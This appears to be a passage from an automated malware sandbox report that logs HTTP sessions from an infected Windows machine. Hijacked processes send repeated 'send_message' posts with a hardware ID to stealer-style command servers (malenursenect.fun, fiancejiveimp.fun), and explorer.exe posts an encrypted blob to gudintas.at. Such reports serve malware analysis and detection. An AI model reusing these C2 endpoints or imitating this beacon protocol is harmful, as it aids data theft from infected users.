                                                                    Oct 3, 2023 09:55:22.893424034 CEST6367INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    35192.168.2.349869104.21.1.1880C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Oct 3, 2023 09:55:22.733319044 CEST6365OUTPOST /api HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                    User-Agent: TeslaBrowser/5.5
                                                                    Content-Length: 541
                                                                    Host: malenursenect.fun
                                                                    Oct 3, 2023 09:55:22.733838081 CEST6366OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67
                                                                    Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"94F54833719A8886115329378BD39393A3A15022--SqDe87817huf871793q74Content-Disposition
                                                                    Oct 3, 2023 09:55:23.061239004 CEST6369INHTTP/1.1 200 OK
                                                                    Date: Tue, 03 Oct 2023 07:55:23 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    X-Powered-By: PHP/8.2.7
                                                                    Set-Cookie: PHPSESSID=36m0ddol2oik43bm4e12hhn0aq; expires=Sat, 27 Jan 2024 01:42:01 GMT; Max-Age=9999999; path=/
                                                                    Set-Cookie: xdober_setting_show_country=1; expires=Sat, 02 Dec 2023 07:55:22 GMT; Max-Age=5184000; path=/
                                                                    Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                    Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                    Pragma: no-cache
                                                                    CF-Cache-Status: DYNAMIC
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=vBJ7SvQan5DYpjQXaLN%2B7SxMRtcacbO4mdR%2Ff9akCrbtFcqs7HdEjG2vJuO%2FtYOP3KmLTirjeBmvYEftNmvWRcKLIob0WqsD6rjwRJFBG3uZfyHWtxEJVSx5xYTmCe99D3yKYQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 81039f5b4f0f81ab-IAD
                                                                    Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                    Data Ascii: 2ok
                                                                    Oct 3, 2023 09:55:23.061268091 CEST6369INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    36192.168.2.349871172.67.137.12580C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Oct 3, 2023 09:55:23.110939980 CEST6370OUTPOST /api HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                    User-Agent: TeslaBrowser/5.5
                                                                    Content-Length: 534
                                                                    Host: fiancejiveimp.fun
                                                                    Oct 3, 2023 09:55:23.111397028 CEST6371OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67
                                                                    Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"94F54833719A8886115329378BD39393A3A15022--SqDe87817huf871793q74Content-Disposition
                                                                    Oct 3, 2023 09:55:23.440721989 CEST6379INHTTP/1.1 200 OK
                                                                    Date: Tue, 03 Oct 2023 07:55:23 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    X-Powered-By: PHP/8.2.7
                                                                    Set-Cookie: PHPSESSID=9u23hf5ktmjskhekl4vogdc3mc; expires=Sat, 27 Jan 2024 01:42:02 GMT; Max-Age=9999999; path=/
                                                                    Set-Cookie: xdober_setting_show_country=1; expires=Sat, 02 Dec 2023 07:55:23 GMT; Max-Age=5184000; path=/
                                                                    Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                    Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                    Pragma: no-cache
                                                                    CF-Cache-Status: DYNAMIC
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=f7IouTyuqGsauU8OQ2Eu419g2lyt8gAiil3gFcZFagzXMll8VhUNMm%2FvVO6diU246gLShVWd4%2B%2FU8qFVK7mTR55b5bfU5mBtcaf9dwykdK2IzdK1jrftHop%2FKR8SJtkMCxyG7w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 81039f5daaca9c67-IAD
                                                                    Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                    Data Ascii: 2ok
                                                                    Oct 3, 2023 09:55:23.440742970 CEST6379INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    37192.168.2.349872104.21.1.1880C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Oct 3, 2023 09:55:23.277622938 CEST6371OUTPOST /api HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                    User-Agent: TeslaBrowser/5.5
                                                                    Content-Length: 541
                                                                    Host: malenursenect.fun
                                                                    Oct 3, 2023 09:55:23.278090954 CEST6372OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67
                                                                    Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"94F54833719A8886115329378BD39393A3A15022--SqDe87817huf871793q74Content-Disposition
                                                                    Oct 3, 2023 09:55:23.637214899 CEST6381INHTTP/1.1 200 OK
                                                                    Date: Tue, 03 Oct 2023 07:55:23 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    X-Powered-By: PHP/8.2.7
                                                                    Set-Cookie: PHPSESSID=jmrt2q0ntcmvdi7noi8l0ch7fc; expires=Sat, 27 Jan 2024 01:42:02 GMT; Max-Age=9999999; path=/
                                                                    Set-Cookie: xdober_setting_show_country=1; expires=Sat, 02 Dec 2023 07:55:23 GMT; Max-Age=5184000; path=/
                                                                    Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                    Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                    Pragma: no-cache
                                                                    CF-Cache-Status: DYNAMIC
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=nVW6ykBt5X8xuiqa3D5EEiCkOit9nEl56yjbS9wTWkWGHH0lwX7i7qyhULjnUre5rhAwj02R2uQm2%2BE1SCxdl4WMRhzJuDvs7sYx0ceoTTrMgjSYo4eOAGUDyHbxtr%2BkZemftw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 81039f5ebd350935-IAD
                                                                    Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                    Data Ascii: 2ok
                                                                    Oct 3, 2023 09:55:23.637248993 CEST6381INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    38192.168.2.349873172.67.137.12580C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Oct 3, 2023 09:55:23.786974907 CEST6381OUTPOST /api HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                    User-Agent: TeslaBrowser/5.5
                                                                    Content-Length: 534
                                                                    Host: fiancejiveimp.fun
                                                                    Oct 3, 2023 09:55:23.787401915 CEST6382OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67
                                                                    Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"94F54833719A8886115329378BD39393A3A15022--SqDe87817huf871793q74Content-Disposition
                                                                    Oct 3, 2023 09:55:24.103533030 CEST6384INHTTP/1.1 200 OK
                                                                    Date: Tue, 03 Oct 2023 07:55:24 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    X-Powered-By: PHP/8.2.7
                                                                    Set-Cookie: PHPSESSID=2s5c81q54vq7v1h99a6h13j0rf; expires=Sat, 27 Jan 2024 01:42:02 GMT; Max-Age=9999999; path=/
                                                                    Set-Cookie: xdober_setting_show_country=1; expires=Sat, 02 Dec 2023 07:55:23 GMT; Max-Age=5184000; path=/
                                                                    Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                    Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                    Pragma: no-cache
                                                                    CF-Cache-Status: DYNAMIC
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=9Db8e7LdeTaDmnujjjDft0cqWcoyA7Jt8xGpRVNZvMHGJDoLmfWp9x7HcbI05tuKInuUuldNKPcoDER9Ps9xw45F2pP7jb%2FCXetqEwGiEQgZiNpNZeNjIcxDbOFGAK12f1JBVg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 81039f61eb5607bf-IAD
                                                                    Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                    Data Ascii: 2ok
                                                                    Oct 3, 2023 09:55:24.103591919 CEST6384INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    39192.168.2.349874104.21.1.1880C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Oct 3, 2023 09:55:23.881927967 CEST6382OUTPOST /api HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                    User-Agent: TeslaBrowser/5.5
                                                                    Content-Length: 541
                                                                    Host: malenursenect.fun
                                                                    Oct 3, 2023 09:55:23.883096933 CEST6383OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67
                                                                    Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"94F54833719A8886115329378BD39393A3A15022--SqDe87817huf871793q74Content-Disposition
                                                                    Oct 3, 2023 09:55:24.222775936 CEST6386INHTTP/1.1 200 OK
                                                                    Date: Tue, 03 Oct 2023 07:55:24 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    X-Powered-By: PHP/8.2.7
                                                                    Set-Cookie: PHPSESSID=bo59qn79cen7hgcbbpq8k6h50o; expires=Sat, 27 Jan 2024 01:42:03 GMT; Max-Age=9999999; path=/
                                                                    Set-Cookie: xdober_setting_show_country=1; expires=Sat, 02 Dec 2023 07:55:24 GMT; Max-Age=5184000; path=/
                                                                    Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                    Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                    Pragma: no-cache
                                                                    CF-Cache-Status: DYNAMIC
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=vortFlMeOZ%2FyWsUKBzCi4oOCy0uFtPHMo9w4COc%2Bwz2WgWnzRdi%2FlnuX9q8TLS8J7l41rp1vkk5g35qYFDy9S0oUid5Wy8ovdPWo9LpRva0h1yHeIhyWTvvZ3yagzmScKvfqlA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 81039f6279060840-IAD
                                                                    Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                    Data Ascii: 2ok
                                                                    Oct 3, 2023 09:55:24.222803116 CEST6386INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    4192.168.2.349807200.92.136.25480C:\Windows\explorer.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Oct 3, 2023 09:54:25.673935890 CEST1541OUTPOST /tmp/ HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Accept: */*
                                                                    Referer: http://hjjvq.com/
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                    Content-Length: 333
                                                                    Host: gudintas.at
                                                                    Oct 3, 2023 09:54:25.673935890 CEST1542OUTData Raw: 3b 6e 52 62 f2 c2 1e 26 d6 db c6 07 04 74 0b cc 0c 03 c0 96 1a 05 92 64 0e 75 72 e2 30 c6 b1 6e 9b 2b c3 5d 01 6a 51 69 e9 9d 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 09 6b 2c 90 f5 76 0b 75 4e 57 ea fe
                                                                    Data Ascii: ;nRb&tdur0n+]jQi?*$`7C[zqNA -[k,vuNW*\AoBC5}FnfBx&.2S#%l:$\A$|e.N8 |Fro_C.]jlrBp
                                                                    Oct 3, 2023 09:54:26.459897041 CEST1542INHTTP/1.0 404 Not Found
                                                                    Date: Tue, 03 Oct 2023 07:54:26 GMT
                                                                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15
                                                                    X-Powered-By: PHP/7.4.15
                                                                    Content-Length: 331
                                                                    Connection: close
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    40192.168.2.349875104.21.81.1780C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Oct 3, 2023 09:55:24.319700003 CEST6387OUTPOST /api HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                    User-Agent: TeslaBrowser/5.5
                                                                    Content-Length: 534
                                                                    Host: fiancejiveimp.fun
                                                                    Oct 3, 2023 09:55:24.320118904 CEST6387OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67
                                                                    Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"94F54833719A8886115329378BD39393A3A15022--SqDe87817huf871793q74Content-Disposition
                                                                    Oct 3, 2023 09:55:24.557449102 CEST6390INHTTP/1.1 200 OK
                                                                    Date: Tue, 03 Oct 2023 07:55:24 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    X-Powered-By: PHP/8.2.7
                                                                    Set-Cookie: PHPSESSID=s62fteiuuh9tu37pg8a8u6lg25; expires=Sat, 27 Jan 2024 01:42:03 GMT; Max-Age=9999999; path=/
                                                                    Set-Cookie: xdober_setting_show_country=1; expires=Sat, 02 Dec 2023 07:55:24 GMT; Max-Age=5184000; path=/
                                                                    Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                    Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                    Pragma: no-cache
                                                                    CF-Cache-Status: DYNAMIC
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=J%2Bt18ETVtOA9wGXxtWflNN6jIDVYSjXkAn1LSbm7C54hI5%2BmOiGHKqvUj1nCKpbtjI1z6FZFEi%2B42Su5uZonT1HGlT5mcuDRAZV5cctGrYAKwycn9SJTqwc9itexZ%2FxHTFMZ%2Bw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 81039f653f800649-IAD
                                                                    Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                    Data Ascii: 2ok
                                                                    Oct 3, 2023 09:55:24.557480097 CEST6390INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    41192.168.2.349876172.67.151.21980C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Oct 3, 2023 09:55:24.450311899 CEST6388OUTPOST /api HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                    User-Agent: TeslaBrowser/5.5
                                                                    Content-Length: 541
                                                                    Host: malenursenect.fun
                                                                    Oct 3, 2023 09:55:24.450737953 CEST6388OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67
                                                                    Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"94F54833719A8886115329378BD39393A3A15022--SqDe87817huf871793q74Content-Disposition
                                                                    Oct 3, 2023 09:55:24.767977953 CEST6391INHTTP/1.1 200 OK
                                                                    Date: Tue, 03 Oct 2023 07:55:24 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    X-Powered-By: PHP/8.2.7
                                                                    Set-Cookie: PHPSESSID=f531bsl5dq7ubrfifonbluu793; expires=Sat, 27 Jan 2024 01:42:03 GMT; Max-Age=9999999; path=/
                                                                    Set-Cookie: xdober_setting_show_country=1; expires=Sat, 02 Dec 2023 07:55:24 GMT; Max-Age=5184000; path=/
                                                                    Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                    Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                    Pragma: no-cache
                                                                    CF-Cache-Status: DYNAMIC
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=oLz9GbtUK3Bd3dXfzAYy92BrgfgEqFBuQD3LjeYx0peSHv%2FBgwqTd2sngY52coR4z0ZLsKcURe6h1EzXi03mcw81U3ZnIvEQgRmwB%2Ftlu2UJV4Lvj4BHz57%2FF1p5bz0DbjwdyQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 81039f660cd6819a-IAD
                                                                    Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                    Data Ascii: 2ok
                                                                    Oct 3, 2023 09:55:24.768090963 CEST6391INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    42192.168.2.349877104.21.81.1780C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Oct 3, 2023 09:55:24.771079063 CEST6392OUTPOST /api HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                    User-Agent: TeslaBrowser/5.5
                                                                    Content-Length: 534
                                                                    Host: fiancejiveimp.fun
                                                                    Oct 3, 2023 09:55:24.771686077 CEST6392OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67
                                                                    Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"94F54833719A8886115329378BD39393A3A15022--SqDe87817huf871793q74Content-Disposition
                                                                    Oct 3, 2023 09:55:25.099364996 CEST6395INHTTP/1.1 200 OK
                                                                    Date: Tue, 03 Oct 2023 07:55:25 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    X-Powered-By: PHP/8.2.7
                                                                    Set-Cookie: PHPSESSID=ssk72vfdo3dr4qt1o5kcuo41b2; expires=Sat, 27 Jan 2024 01:42:03 GMT; Max-Age=9999999; path=/
                                                                    Set-Cookie: xdober_setting_show_country=1; expires=Sat, 02 Dec 2023 07:55:24 GMT; Max-Age=5184000; path=/
                                                                    Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                    Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                    Pragma: no-cache
                                                                    CF-Cache-Status: DYNAMIC
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=A0hURg6Rpi8duY2HaSa%2FwlcRk8r0QbY5IdceeqBywSCis3TlKHyRWq3RQBNPcUL%2B25WHA3arXqv9fDbcAmDiW9q5VjrLEOmIa1HteJss4rP7gZK05y5fUJWNFXHVJuINDzJTAw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 81039f68097005fb-IAD
                                                                    Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                    Data Ascii: 2ok
                                                                    Oct 3, 2023 09:55:25.099406958 CEST6395INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    43192.168.2.349878104.21.1.1880C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Oct 3, 2023 09:55:24.985321045 CEST6393OUTPOST /api HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                    User-Agent: TeslaBrowser/5.5
                                                                    Content-Length: 541
                                                                    Host: malenursenect.fun
                                                                    Oct 3, 2023 09:55:24.986191988 CEST6394OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67
